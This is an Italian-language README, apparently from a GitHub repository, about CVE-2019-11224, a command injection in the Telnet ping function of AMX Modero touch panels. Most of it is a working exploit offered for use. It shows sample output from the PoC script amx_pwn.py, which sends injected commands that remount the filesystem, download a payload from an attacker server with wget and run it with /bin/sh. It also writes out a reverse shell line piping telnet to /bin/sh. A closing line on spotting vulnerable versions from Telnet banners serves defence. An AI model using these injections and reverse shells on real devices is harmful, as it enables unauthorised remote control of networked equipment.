
Modero AMX Esecuzione di codice (CVE-2019–11224)
Questo repository contiene alcune fonti su CVE-2019–11224 (https://link.medium.com/zukA0oCnV8) perché ho notato che il collegamento non funziona più sul sito ufficiale NIST.
I dispositivi Modero AMX sono essenzialmente pannelli touch per sale riunioni, possono essere osservati in molti ambienti diversi e di solito hanno Telnet aperto.
Poiché emulano una console poco ideale tramite Telnet, esiste una vulnerabilità di code injection attraverso la funzione "ping" usando separatori di comando.
Da quando ho creato originariamente questo repository GitHub e ho armeggiato con i dispositivi AMX, ho creato un POC e un processo di exploit per ottenere reverse shell con questa vulnerabilità. Spero che ti porti gioia :}
Ho scritto un POC amx_pwn.py che dovrebbe essere utile. Esempio di output qui sotto:
┌──(cozyfox㉿submarine)-[/CVE-2019-11224]
└─$ python3 amx_pwn.py -t 192.168.0.21 -fs 192.168.0.41 -fn something.jpg -v 1
[!] Your current settings are:
[*] Target: 192.168.0.21
[*] FileServer and Filename URL: http://192.168.0.41/something.jpg
[*] Verbosity: 1
(^_^)7 Continue? (Y/N): y
[*] RUNNING
Telnet(192.168.0.21,23): recv b'\xff\xfb\x01\r\nWelcome to Modero v2.86.50 Copyright (C) AMX '
Telnet(192.168.0.21,23): IAC WILL 1
Telnet(192.168.0.21,23): recv b'LLC 2002-2009\r\n>'
b'\r\nWelcome to Modero v2.86.50 Copyright (C) AMX LLC 2002-2009\r\n>'
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20-o\\x20remount,rw\\x20/'&&mount$CMD\r\n"
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
<..cut to remove clutter...>
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
taking a snooze
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20http://192.168.0.41/something.jpg'&&wget$CMD\r\n"
taking a snooze
...
ping ;CMD=$'\x20-o\x20remount,rw\x20/'&&mount$CMDtelnet {YOUR_IP} 1332 | /bin/sh | telnet {YOUR_IP} 1333ping ;CMD=$'\x20http://{YOUR_SYSTEM}/{YOUR_FILE}'&&wget$CMDping ;CMD=$'\x20{YOUR_FILE}'&&/bin/sh$CMDControlla i banner Telnet (tipicamente porta 23) contenenti:
Welcome to Modero: o Copyright (C) AMX LLC. Cerca versioni precedenti alla 2.87.13